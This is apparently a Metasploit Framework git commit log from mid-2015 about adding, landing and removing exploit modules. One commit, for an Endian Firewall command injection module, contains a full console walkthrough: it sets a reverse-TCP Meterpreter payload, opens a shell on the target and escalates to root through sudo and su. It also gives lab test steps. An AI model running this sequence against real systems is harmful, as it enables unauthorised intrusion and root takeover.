William Vu
6e12cbf98f
Land #5712 , php_wordpress_lastpost removal
...
Deprecated.
2015-07-13 18:31:31 +00:00
William Vu
dd188b1943
Land #5713 , php_wordpress_infusionsoft removal
...
Deprecated.
2015-07-13 18:31:01 +00:00
wchen-r7
4960e64597
Remove php_wordpress_foxypress, use wp_foxypress_upload
...
Please use exploit/unix/webapp/wp_foxypress_upload instead.
2015-07-13 12:53:34 -05:00
wchen-r7
dfbeb24a8f
Remove php_wordpress_infusionsoft, use wp_infusionsoft_upload
...
Please use exploit/unix/webapp/wp_infusionsoft_upload instead.
2015-07-13 12:51:48 -05:00
wchen-r7
b80427aed2
Remove php_wordpress_lastpost, use wp_lastpost_exec instead.
...
Please use exploit/unix/webapp/wp_lastpost_exec instead
2015-07-13 12:49:27 -05:00
wchen-r7
90cc3f7891
Remove php_wordpress_optimizepress, use wp_optimizepress_upload
...
Please use exploit/unix/webapp/wp_optimizepress_upload instead.
2015-07-13 12:45:39 -05:00
wchen-r7
4177cdacd6
Remove php_wordpress_total_cache, please use wp_total_cache_exec
...
The time is up for exploit/unix/webapp/php_wordpress_total_cache,
please use exploit/unix/webapp/wp_total_cache_exec instead.
2015-07-13 12:41:29 -05:00
wchen-r7
e638d85f30
Merge branch 'upstream-master' into bapv2
2015-07-12 02:01:09 -05:00
h00die
8819674522
updated per feedback from PR
2015-07-11 21:03:02 -04:00
wchen-r7
f7ce6dcc9f
We agreed to Normal
2015-07-11 02:07:18 -05:00
wchen-r7
0ff7333090
Lower the ranking for CVE-2015-5122
...
As an initial release we forgot to lower it.
2015-07-11 02:05:56 -05:00
wchen-r7
1289ec8863
authors
2015-07-11 01:38:21 -05:00
wchen-r7
6eabe5d48c
Update description
2015-07-11 01:36:26 -05:00
wchen-r7
54fc712131
Update Win 8.1 checks
2015-07-11 01:33:23 -05:00
jvazquez-r7
6f0b9896e1
Update description
2015-07-11 00:56:18 -05:00
jvazquez-r7
115549ca75
Delete old check
2015-07-11 00:42:59 -05:00
jvazquez-r7
63005a3b92
Add module for flash CVE-2015-5122
...
* Just a fast port for the exploit leaked
* Just tested on win7sp1 / IE11
2015-07-11 00:28:55 -05:00
h00die
bff92f2304
Initial add
2015-07-10 21:13:12 -04:00
jvazquez-r7
5a045677bc
Add waiting message
2015-07-10 18:48:46 -05:00
jvazquez-r7
8d52c265d9
Delete wfsdelay
2015-07-10 18:46:27 -05:00
jvazquez-r7
63e91fa50f
Add reference
2015-07-10 18:46:06 -05:00
jvazquez-r7
677cd97cc2
Update information
2015-07-10 18:39:11 -05:00
jvazquez-r7
6c6a778218
Modify arkeia_agent_exec title
2015-07-10 18:38:25 -05:00
jvazquez-r7
4995728459
Modify arkeia_agent_exec ranking
2015-07-10 18:37:24 -05:00
jvazquez-r7
858f63cdbf
Land #5693 , @xistence VNC Keyboard EXEC module
2015-07-10 18:35:44 -05:00
jvazquez-r7
1326a26be5
Do code cleanup
2015-07-10 18:35:13 -05:00
jvazquez-r7
917282a1f1
Fix ranking
2015-07-10 17:49:15 -05:00
jvazquez-r7
e063e26627
Land #5689 , @xistence's module for Western Digital Arkeia command injection
2015-07-10 17:11:35 -05:00
jvazquez-r7
bdd8b56336
fix comment
2015-07-10 16:28:20 -05:00
jvazquez-r7
95ae7d8cae
Fix length limitation
2015-07-10 16:24:49 -05:00
Mo Sadek
3347b90db7
Land #5676 , print_status with ms14_064
2015-07-10 14:40:49 -05:00
jvazquez-r7
29a497a616
Read header as 6 bytes
2015-07-10 14:25:57 -05:00
jvazquez-r7
bed3257a3f
Change default HTTP_DELAY
2015-07-10 12:50:26 -05:00
jvazquez-r7
c9d2ab58d3
Use HttpServer::HTML
...
* And make the exploit Aggressive
2015-07-10 12:48:21 -05:00
jvazquez-r7
e1192c75a9
Fix network communication on `communicate`
...
* Some protocol handling just to not read amounts of data blindly
2015-07-10 11:57:48 -05:00
Tod Beardsley
9206df077f
Land #5694 , R7-2015-08
2015-07-10 11:42:57 -05:00
jvazquez-r7
9ba515f185
Fix network communication on `check`
...
* Some protocol handling just to not read amounts of data blindly
2015-07-10 11:32:49 -05:00
jvazquez-r7
c70be64517
Fix version check
2015-07-10 10:57:55 -05:00
jvazquez-r7
34a6984c1d
Fix variable name
2015-07-10 10:44:38 -05:00
jvazquez-r7
2c7cc83e38
Use single quotes
2015-07-10 10:34:47 -05:00
jvazquez-r7
f66cf91676
Fix metadata
2015-07-10 10:33:02 -05:00
xistence
b916a9d267
VNC Keyboard Exec
2015-07-10 14:08:32 +07:00
xistence
13a69e4011
X11 Keyboard Exec
2015-07-10 13:57:54 +07:00
xistence
52d41c8309
Western Digital Arkeia 'ARKFS_EXEC_CMD' <= v11.0.12 Remote Code Execution
2015-07-10 09:51:28 +07:00
Michael Messner
d7beb1a685
feedback included
2015-07-09 08:31:11 +02:00
HD Moore
25e0f888dd
Initial commit of R7-2015-08 coverage
2015-07-08 13:42:11 -05:00
wchen-r7
a3ec56c4cb
Do it in on_request_exploit because it's too specific
2015-07-08 12:32:38 -05:00
wchen-r7
cefbdbb8d3
Avoid unreliable targets
...
If we can't guarantee GreatRanking on specific targets, avoid them.
2015-07-08 12:12:53 -05:00
wchen-r7
6a33807d80
No Chrome for now
2015-07-07 15:56:58 -05:00
jvazquez-r7
f8b668e894
Update ranking and References
2015-07-07 15:43:02 -05:00
Tod Beardsley
116c3f0be1
Add CVE as a real ref, too
2015-07-07 14:46:44 -05:00
Tod Beardsley
3d630de353
Replace with a real CVE number
2015-07-07 14:44:12 -05:00
wchen-r7
fdb715c9dd
Merge branch 'upstream-master' into bapv2
2015-07-07 13:45:39 -05:00
jvazquez-r7
829b08b2bf
Complete authors list
2015-07-07 12:49:54 -05:00
wchen-r7
49effdf3d1
Update description
2015-07-07 12:46:02 -05:00
wchen-r7
d885420aff
This changes the version requirement for adobe_flash_hacking_team_uaf.rb
...
Because it works for Win 8.1 + IE11 too
2015-07-07 12:42:56 -05:00
wchen-r7
d30688b116
Add more requirement info
2015-07-07 12:33:47 -05:00
jvazquez-r7
d9aacf2d41
Add module for hacking team flash exploit
2015-07-07 11:19:48 -05:00
wchen-r7
c37b60de7b
Do some print_status with ms14_064
2015-07-07 00:57:37 -05:00
Michael Messner
5b6ceff339
mime message
2015-07-06 15:00:12 +02:00
joev
133e221dcd
Remove unnecessary steps.
2015-07-05 19:00:58 -05:00
joev
c993c70006
Remove sleep(), clean up WritableDir usage.
2015-07-05 18:59:00 -05:00
joev
72a1e9ad99
Add module for rootpipe+entitlements exploit for 10.10.3.
2015-07-05 18:19:46 -05:00
Ben Lincoln
6e9a477367
Removed reference URL for the report to the vendor, as it is no
...
longer valid.
2015-07-03 13:48:24 -07:00
Ben Lincoln
02ace9218b
Added handling for HTTP 401 (Authorization Required) response from target.
...
Added Exploit DB entries to references list.
Minor change to description text for clarity.
2015-07-03 13:36:44 -07:00
HD Moore
43d47ad83e
Port BAPv2 to Auxiliary
2015-07-02 15:29:24 -05:00
William Vu
8892cbdd10
Fix some minor things
2015-07-02 14:32:16 -05:00
Tod Beardsley
95f19e6f1f
Minor description edits for clarity
...
Edited modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
first landed in #5642 , Adobe Flash CVE-2015-3113 Nellymoser Audio
Decoding BOF
Edited modules/post/windows/gather/credentials/enum_laps.rb first landed
in #5590 , @Meatballs1 adds MS LAPS Enum post mod
Edited modules/post/windows/gather/enum_ad_bitlocker.rb first landed in
Keys from AD
2015-07-02 13:51:37 -05:00
HD Moore
87e6325737
Revert BAPv2 changes to framework/libraries/handlers
2015-07-02 12:10:21 -05:00
Donny Maasland
e355e56539
Add check
2015-07-02 10:54:44 +02:00
wchen-r7
2957924c78
Merge branch 'upstream-master' into bapv2
2015-07-02 01:46:31 -05:00
Daniel Jensen
3f5721f5be
Fixed identified issues.
2015-07-02 13:06:03 +12:00
jvazquez-r7
3b9ba189f7
Add CVE-2015-3043 information
2015-07-01 19:56:35 -05:00
wchen-r7
8051a99f4a
Merge branch 'upstream-master' into bapv2
2015-07-01 18:45:42 -05:00
wchen-r7
32d5e7f3de
Land #5642 , Adobe Flash CVE-2015-3113 Nellymoser Audio Decoding BOF
2015-07-01 18:44:38 -05:00
wchen-r7
93c74efb97
Add Ubuntu as a tested target
2015-07-01 18:43:22 -05:00
jvazquez-r7
ee118aa89d
Fix description
2015-07-01 13:30:22 -05:00
jvazquez-r7
1de94a6865
Add module for CVE-2015-3113
2015-07-01 13:13:57 -05:00
Ben Lincoln
db721dff8e
Cleaned up double-negative logic.
...
Decreased default HTTPClientTimeout to 5 seconds.
2015-07-01 09:34:11 -07:00
Ben Lincoln
6ceb734972
Replaced standard option TIMEOUT with advanced option
...
HTTPClientTimeout per void-in's request.
Added handling for HTTP 404 response condition from server.
2015-07-01 09:04:15 -07:00
Donny Maasland
56c3102603
That's what you get for making edits on github.com..
2015-07-01 17:51:57 +02:00
Donny Maasland
4847fb9830
Add a neater powershell command
2015-07-01 17:47:47 +02:00
Donny Maasland
822a46fee6
Merge branch 'master' of github:dmaasland/metasploit-framework
2015-07-01 17:47:33 +02:00
Donny Maasland
4f72df3202
Create a neater powershell command
2015-07-01 17:47:08 +02:00
Donny Maasland
ffe710af2d
Update registry_persistence.rb
...
Omg spaces
2015-07-01 17:21:12 +02:00
Donny Maasland
26e3ec0a5f
Add a switch for creating a cleanup rc file
2015-07-01 17:06:16 +02:00
Donny Maasland
20708ebc82
Add a check to prevent accidental deletion of existing registry keys
2015-07-01 16:45:03 +02:00
Donny Maasland
2e48bae71c
fixes
2015-07-01 16:15:13 +02:00
Donny Maasland
335487afa0
fixes
2015-07-01 16:09:55 +02:00
Donny Maasland
d0845b8c66
msftidy fix
2015-07-01 12:50:34 +02:00
Donny Maasland
a3db6c6ae3
Msftidy fix
2015-07-01 12:47:10 +02:00
Donny Maasland
bd94f50fb0
add registry_persistence.rb
2015-07-01 12:26:46 +02:00
Daniel Jensen
f48bb4250e
Removed some overly verbose output.
2015-07-01 22:03:42 +12:00
Daniel Jensen
1ede519b8d
Added Watchguard XCS remote root exploit module.
2015-07-01 21:11:23 +12:00
Ben Lincoln
3d32438b34
Added missing closing paren in description text.
2015-06-30 12:43:31 -07:00
Ben Lincoln
e929dec829
Re-formatted and tweaked the module description.
2015-06-30 12:42:17 -07:00
William Vu
3632cc44c5
Fix nil error when target not found
2015-06-30 11:48:41 -05:00
Ben Lincoln
ce61bcd3b4
Removed a trailing space from line 40.
2015-06-29 22:48:16 -07:00
aos
13dc181f1c
Exploit Module: Endian Firewall Proxy Password Change Command Injection
...
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)
Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2
Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1
Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.
Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.
Example usage / output:
```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit
[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress - 18.28% done (196/1072 bytes)
[*] Command Stager progress - 36.57% done (392/1072 bytes)
[*] Command Stager progress - 54.85% done (588/1072 bytes)
[*] Command Stager progress - 73.13% done (784/1072 bytes)
[*] Command Stager progress - 91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)
meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer : efw220.vuln.local
OS : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie
bash: no job control in this shell
bash-3.00# whoami
root
```
Steps to verify module functionality:
Go to http://sourceforge.net/projects/efw/files/Development/
Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.
Download the ISO file for that version.
Create a VM using the ISO:
For purposes of VM configuration:
- Endian is based on the RHEL/CentOS/Fedora Core Linux
distribution.
- The ISOs will create a 32-bit x86 system.
- 512MB of RAM and 4GB of disk space should be more than enough.
- Be sure to configure the VM with at least two NICs, as the Endian
setup is difficult (impossible?) to complete with less than two
network interfaces on the host.
For the Endian OS-level (Linux) installation:
- Default options are fine where applicable.
- Be sure to pick a valid IP for the "Green" network interface, as
you will use it to access a web GUI to complete the configuration
- If prompted to create a root/SSH password and/or web admin
password, make a note of them. Well, make a note of the web admin
password - the exploit module will let you change the root
password later if you want to. This step is dependent on the
version selected - some will prompt, others default the values to
"endian".
- Once the OS-level configuration is complete, access the web
interface to complete the setup. If you used 172.16.47.1 for the
"Green" interface, then the URL will be
https://172.16.47.1:10443/
- If the web interface is not accessible, reboot the VM (in some
versions, the web interface does not come up until after the
first post-installation reboot).
For the web interface-based configuration:
- If you were prompted to select an admin password, use it. If not,
the username/password is admin/endian.
- Use the second NIC for the "Red" interface. It will not actually
be used during this walkthrough, so feel free to specify a bogus
address on a different/nonexistent subnet. Same for its default
gateway.
- Once the base configuration is complete, access the main web
interface URL again.
- Switch to the Proxy tab.
- Enable the HTTP proxy.
- Click Save (or Apply, depending on version).
- If prompted to apply the settings, do so.
- Click on the Authentication sub-tab.
- Make sure the Authentication Method is Local (this should be the
default).
- Click the _manage users_ (Or _User management_, etc., depending
on version) button.
- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
- Enter "proxyuser" for the username, and "password123" for the
password, or modify the directions below this point accordingly.
- Click the _Create user_ button.
- If prompted to apply the settings, do so.
Module test process:
From within the MSF console, execute these commands:
```
use exploit/linux/http/efw_chpasswd_exec
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [YOUR_HOST_IP]
set LPORT 443
set RHOST [ENDIAN_GREEN_IP]
set EFW_USERNAME proxyuser
set EFW_PASSWORD password123
exploit
```
Once Meterpreter connects, execute the following Meterpreter
commands:
```
getuid
sysinfo
shell
```
Within the OS shell, execute the following commands:
```
whoami
uname -a
sudo -l
sudo /usr/local/bin/chrootpasswd
```
It will appear as though the command has hung, but it is actually
waiting for input. Type "IlikerootaccessandIcannotlie", then press
enter.
Execute the following OS command in the shell:
su
Type "IlikerootaccessandIcannotlie", then press enter.
Verify root access (whoami, etc.).
2015-06-29 12:03:17 -07:00
wchen-r7
7aeb9e555b
Change ranking and support CAMPAIGN_ID
2015-06-29 12:13:46 -05:00
h00die
1d50bda609
initial add of blank file
2015-06-27 21:38:25 -04:00
wchen-r7
9bd920b169
Merge branch 'upstream-master' into bapv2
2015-06-27 12:19:55 -05:00
William Vu
326bec0a1f
Land #5581 , s/shell_command_token/cmd_exec/
2015-06-26 16:59:40 -05:00
jvazquez-r7
a10fa02b00
Land #5606 , @wchen-r7's glassfish fixes
2015-06-26 14:12:50 -05:00
wchen-r7
3b5e2a0c6e
Use TARGETURI
2015-06-26 14:02:17 -05:00
wchen-r7
b46e1be22f
Land #5371 , Add file checking to the on_new_session cleanup
2015-06-26 13:33:57 -05:00
Tod Beardsley
31eedbcfa0
Minor cleanups on recent modules
...
Edited modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
first landed in #5577 , MS15-034 HTTP.SYS Information Disclosure
Edited modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
first landed in #5605 , CVE-2015-3105 flash exploit
Edited modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb
first landed in #5559 , Adobe Flash Player ShaderJob Buffer Overflow
Edited modules/auxiliary/test/report_auth_info.rb first landed in #5540 ,
@wchen-r7's changes for multiple auxiliary modules to use the new cred
API
2015-06-26 12:18:33 -05:00
jvazquez-r7
7ccc86d338
Use cmd_exec
2015-06-26 11:54:19 -05:00
jvazquez-r7
31b7ef49d6
Solve conflicts
2015-06-26 11:36:17 -05:00
wchen-r7
c70e38a14e
Do more reporting
2015-06-25 22:39:56 -05:00
wchen-r7
5ef4cc2bb4
Save creds
2015-06-25 17:10:20 -05:00
wchen-r7
1a371b11b0
Update description
2015-06-25 17:04:31 -05:00
jvazquez-r7
ee0377ca16
Add module for CVE-2015-3105
2015-06-25 13:35:01 -05:00
wchen-r7
c330d10403
Make SSL as a basic option
...
Also:
Fix #5558
2015-06-25 02:06:51 -05:00
wchen-r7
5c98da05fb
This works for Glassfish 4.0 & 9.1
2015-06-25 01:58:24 -05:00
wchen-r7
c826785ebb
Fix auth bypass
2015-06-24 19:49:04 -05:00
wchen-r7
8e4fa80728
This looks good so far
2015-06-24 19:30:02 -05:00
Spencer McIntyre
2206a6af73
Support older targets x86 for MS15-051
2015-06-25 09:33:15 +10:00
William Vu
a149fb5710
Land #5554 , @g0tmi1k's persistence improvements
2015-06-24 14:37:25 -05:00
William Vu
e7e8135acd
Clean up module
2015-06-24 14:35:10 -05:00
Michael Messner
c8dddbff70
server header
2015-06-24 21:32:01 +02:00
wchen-r7
380af29482
Progress?
2015-06-24 14:17:45 -05:00
Michael Messner
8bc012a665
echo stager via upload vulnerability
2015-06-23 23:09:08 +02:00
wchen-r7
6046994138
version does not return nil
2015-06-23 10:31:01 -05:00
wchen-r7
dedfca163d
Change check()
2015-06-22 15:05:12 -05:00
jvazquez-r7
784be06b6f
Update nmap
...
* Use cmd_exec
2015-06-22 14:20:02 -05:00
jvazquez-r7
d98d2ffd4d
Update setuid_viscosity
...
* Use cmd_exec
2015-06-22 14:04:04 -05:00
jvazquez-r7
60bdc10aed
Update setuid_tunnelblick
...
* Use cmd_exec
2015-06-22 13:57:33 -05:00
jvazquez-r7
6a00ce62de
Update persistence module
...
* Delete unused method
2015-06-22 12:25:00 -05:00
OJ
3686accadd
Merge branch 'upstream/master' into cve-2015-1701
2015-06-22 07:52:17 +10:00
Spencer McIntyre
efece12b40
Minor clean ups for ruby strings and check method
2015-06-21 16:07:44 -04:00
Pedro Ribeiro
ea49fd2fdc
Update sysaid_rdslogs_fle_upload.rb
2015-06-20 16:59:28 +01:00
Pedro Ribeiro
3181d76e63
Update sysaid_auth_file_upload.rb
2015-06-20 16:53:33 +01:00
Michael Messner
d8e11789ea
cmd_interact - first try
2015-06-20 07:59:25 +02:00
jvazquez-r7
74bc9f7a91
Land #5529 , @omarix's Windows 2003 SP1 & SP2 French targets for MS08-067
2015-06-19 16:57:07 -05:00
jvazquez-r7
61ad4ada7d
Delete commas
2015-06-19 16:03:16 -05:00
wchen-r7
9da99a8265
Merge branch 'upstream-master' into bapv2
2015-06-19 11:36:27 -05:00
William Vu
2587595a92
Land #5556 , vprint_status fix
2015-06-19 11:24:54 -05:00
William Vu
b994801172
Revert auto tab replacement
2015-06-19 11:22:40 -05:00
jvazquez-r7
6ec8488929
Land #5560 , @wchen-r7 Changes ExcellentRanking to GoodRanking for MS14-064
2015-06-19 11:15:41 -05:00
wchen-r7
15985e8b4f
Land #5559 , Adobe Flash Player ShaderJob Buffer Overflow
2015-06-19 10:38:05 -05:00
jvazquez-r7
c95b3bb31d
Land #5479 , @wchen-r7 Updates kloxo_sqli to use the new cred API
2015-06-19 10:32:21 -05:00
jvazquez-r7
c2f0973ed0
Report attempt_time
2015-06-19 10:31:50 -05:00
jvazquez-r7
1c357e6b3c
Land #5478 , @wchen-r7 Updates ca_arcserve_rpc_authbypass to use the new cred API
2015-06-19 10:21:14 -05:00
jvazquez-r7
0f17f622c3
Report last_attempted_at
2015-06-19 10:20:47 -05:00
jvazquez-r7
357a3929a3
Trying to report more accurate status
2015-06-19 09:51:36 -05:00
wchen-r7
7e91121afc
Change to Metasploit::Model::Login::Status::SUCCESSFUL
2015-06-18 23:44:45 -05:00
wchen-r7
fb9ad663f7
Change to Metasploit::Model::Login::Status::SUCCESSFUL
2015-06-18 23:42:16 -05:00
g0tmi1k
0b55a889d3
persistence - better ruby/msf fu
2015-06-18 21:10:16 +01:00
Tod Beardsley
afcb016814
Minor description fixups.
...
Edited modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb
first landed in #5524 , adobe_flash_pixel_bender_bof in flash renderer.
Removed ASCII bullets since those rarely render correctly.
Edited modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb
first landed in #5252 , @espreto's module for WordPress Front-end Editor
File Upload Vuln. Fixed up some language usage, camel-cased "WordPress."
2015-06-18 13:25:39 -05:00
wchen-r7
13a3f2781d
Change ExcellentRanking to GoodRanking for MS14-064
...
The ms14_064_ole_code_execution exploit's ranking is being lowered
to GoodRanking because of these two reasons:
1. The vulnerable component isn't in Internet Explorer. And BES can't
check it so the exploit still fires even if the target is patched.
2. Although rare, we've seen the exploit crashing IE, and since this
is a memory corruption type of bug, it should not be in Excellent
ranking anyway.
2015-06-18 13:07:44 -05:00
jvazquez-r7
de1542e589
Add module for CVE-2015-3090
2015-06-18 12:36:14 -05:00
g0tmi1k
ce9481d2b7
Inconsistency - If datastore['VERBOSE'] vs vprint
2015-06-18 09:27:01 +01:00
g0tmi1k
a3debe1621
persistence - more options, more verbose
...
...and fewer bugs!
+ Able to define the EXE payload filename
+ Able to setup a handler job
+ Able to execute persistence payload after installing
+ Performs various checks (should be more stable now)
+ Will display various warnings if you're doing something 'different'
+ Added various verbose messages during the process
2015-06-17 13:57:06 +01:00
William Vu
8d640a0c8f
Land #5527 , multi/handler -> exploit/multi/handler
2015-06-15 10:23:26 -05:00
wchen-r7
17b8ddc68a
Land #5524 , adobe_flash_pixel_bender_bof in flash renderer
2015-06-15 02:42:16 -05:00
Michael Messner
145637470a
port, email, cleanup
2015-06-14 08:27:23 +02:00
Michael Messner
1b040f3374
dsp-w110-command-injection
2015-06-13 21:45:56 +02:00
0xFFFFFF
c7cda25582
Empty lines removed at line 624 and line 721.
...
Empty lines removed at line 624 and line 721.
2015-06-13 14:54:10 +01:00
0xFFFFFF
7f0e334d78
Added Windows 2003 SP1 & SP2 French targets
...
```
msf exploit(ms08_067_netap) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   [...]
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   [...]
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)
```
2015-06-13 13:30:02 +01:00
g0tmi1k
a53ca53a6a
Fix inconsistency - multi/handler
2015-06-12 21:23:51 +01:00
jvazquez-r7
f279c6ca3f
Land #5252 , @espreto's module for WordPress Front-end Editor File Upload Vuln
2015-06-12 15:11:10 -05:00
jvazquez-r7
8ed13b1d1b
Add linux support for CVE-2014-0515
2015-06-11 16:18:50 -05:00
wchen-r7
ae21b0c260
Land #5523 , adobe_flash_domain_memory_uaf in the flash renderer
2015-06-10 16:59:19 -05:00
wchen-r7
4c5b1fbcef
Land #5522 , adobe_flash_worker_byte_array_uaf in the flash renderer
2015-06-10 14:49:41 -05:00
jvazquez-r7
6c7ee10520
Update to use the new flash Exploiter
2015-06-10 13:52:43 -05:00
wchen-r7
d622c782ef
Land #5519 , adobe_flash_uncompress_zlib_uninitialized in the flash renderer
2015-06-10 11:52:47 -05:00
wchen-r7
667db8bc30
Land #5517 , adobe_flash_casi32_int_overflow (exec from the flash renderer)
2015-06-10 11:39:13 -05:00
William Vu
b23647d5ae
Land #5521 , @todb-r7's module cleanup
2015-06-10 11:29:41 -05:00
Tod Beardsley
0d979f61ae
Minor fixups on newish modules
2015-06-10 11:09:42 -05:00
jvazquez-r7
fb531d0069
Update version coverage
2015-06-10 09:38:00 -05:00
jvazquez-r7
a6fe383852
Use AS Exploiter
2015-06-10 09:32:52 -05:00
jvazquez-r7
e5d6c9a3cb
Make last code cleanup
2015-06-09 16:01:57 -05:00
jvazquez-r7
cf8c6b510b
Debug version working
2015-06-09 15:46:21 -05:00
William Vu
9fa423464c
Fix #5224 , comma fixes
...
My fault for missing these.
2015-06-09 14:28:01 -05:00
William Vu
8a69704d3e
Fix up commas
2015-06-09 14:27:35 -05:00
William Vu
d31a59cd22
Fix #5224 , altered option description
2015-06-09 14:15:58 -05:00
William Vu
cc8650f98a
Fix TMPPATH description
2015-06-09 14:15:18 -05:00
William Vu
9c97da3b7c
Land #5224 , ProFTPD mod_copy exploit
2015-06-09 14:11:27 -05:00
William Vu
5ab882a8d4
Clean up module
2015-06-09 14:10:46 -05:00
jvazquez-r7
b7f0fad72f
Modify CVE-2014-0569 to use the flash exploitation code
2015-06-09 11:31:39 -05:00
wchen-r7
ea33d7060e
Correct ranking
2015-06-05 21:07:27 -05:00
wchen-r7
ff39e32cc6
Single quote
2015-06-05 21:06:57 -05:00
wchen-r7
ee13a215e9
Merge branch 'upstream-master' into bapv2
2015-06-05 14:09:07 -05:00
jvazquez-r7
318f67fcda
update descriptions
2015-06-05 09:01:20 -05:00
wchen-r7
71a8487091
Correct Flash version in the module description
...
There is no 11.2.202.404, mang.
2015-06-04 23:46:41 -05:00
wchen-r7
5f4b2ed22a
Newline
2015-06-04 23:36:36 -05:00
wchen-r7
69968fc9f1
Merge branch 'upstream-master' into bapv2
2015-06-04 23:36:24 -05:00
jvazquez-r7
02181addc5
Update CVE-2014-0556
2015-06-04 18:23:50 -05:00
wchen-r7
23df66bf3a
Land #5481 , no powershell. exec shellcode from the renderer process.
2015-06-04 15:45:09 -05:00
jvazquez-r7
ab68d8429b
Add more targets
2015-06-04 12:11:53 -05:00
wchen-r7
be709ba370
Merge branch 'upstream-master' into bapv2
2015-06-04 10:33:07 -05:00
wchen-r7
744baf2d44
Update kloxo_sqli to use the new cred API
2015-06-03 23:28:35 -05:00
jvazquez-r7
80cb70cacf
Add support for Windows 8.1/Firefox
2015-06-03 22:46:04 -05:00
wchen-r7
78e4677bb1
Oops it blew up
2015-06-03 20:10:01 -05:00
wchen-r7
a0aa6135c5
Update ca_arcserve_rpc_authbypass to use the new cred API
2015-06-03 20:02:07 -05:00
jvazquez-r7
74117a7a52
Allow to execute payload from the flash renderer
2015-06-03 16:33:41 -05:00
Pedro Ribeiro
d5b33a0074
Update sysaid_rdslogs_fle_upload.rb
2015-06-03 22:01:13 +01:00
Pedro Ribeiro
37827be10f
Update sysaid_auth_file_upload.rb
2015-06-03 22:00:44 +01:00
Pedro Ribeiro
62993c35d3
Create sysaid_rdslogs_fle_upload.rb
2015-06-03 21:45:14 +01:00
Pedro Ribeiro
193b7bcd2e
Create sysaid_auth_file_upload.rb
2015-06-03 21:44:02 +01:00
OJ
a6467f49ec
Update description
2015-06-03 22:17:25 +10:00
OJ
455a3b6b9d
Add butchered version of CVE-2015-1701
2015-06-03 21:48:23 +10:00
James Lee
d03ee5667b
Remove assigned but unused local vars
2015-06-01 16:45:36 -05:00
James Lee
7133f0a68e
Fix typo in author's name
2015-06-01 16:45:09 -05:00
wchen-r7
e83677d29d
rm deprecated mod
2015-05-29 17:43:26 -05:00
wchen-r7
13779adab4
Merge branch 'upstream-master' into bapv2
2015-05-29 14:59:04 -05:00
wchen-r7
6be363d82a
Merge branch 'upstream-master' into bapv2
2015-05-29 14:58:38 -05:00
jvazquez-r7
1be04a9e7e
Land #5182 , @m-1-k-3's exploit for Dlink UPnP SOAP-Header Injection
2015-05-29 14:49:09 -05:00
jvazquez-r7
8b2e49eabc
Do code cleanup
2015-05-29 14:45:47 -05:00
jvazquez-r7
8c7d41c50c
Land #5426 , @wchen-r7's adds more restriction on Windows 7 target for MS14-064
2015-05-29 14:35:44 -05:00
wchen-r7
c3fa52f443
Update description
2015-05-29 13:47:20 -05:00
wchen-r7
dab9a66ea3
Use current ruby hash syntax
2015-05-29 13:43:20 -05:00
jvazquez-r7
9ccf04a63b
Land #5420 , @m-1-k-3's miniigd command injection module (ZDI-15-155)
2015-05-29 13:29:03 -05:00
jvazquez-r7
9ebd6e5d6e
Use REXML
2015-05-29 13:27:19 -05:00
jvazquez-r7
294fa78c1f
Land #5430 , @m-1-k-3's adding specific endianness Arch to some exploits
2015-05-29 11:43:25 -05:00
jvazquez-r7
dd39d196f5
Land #5226 , @m-1-k-3's Airties login Buffer Overflow exploit
2015-05-29 10:51:32 -05:00
jvazquez-r7
952f391fb4
Do minor code cleanup
2015-05-29 10:49:51 -05:00
wchen-r7
2a260f0689
Update description
2015-05-28 15:18:05 -05:00
Michael Messner
666b0bc34a
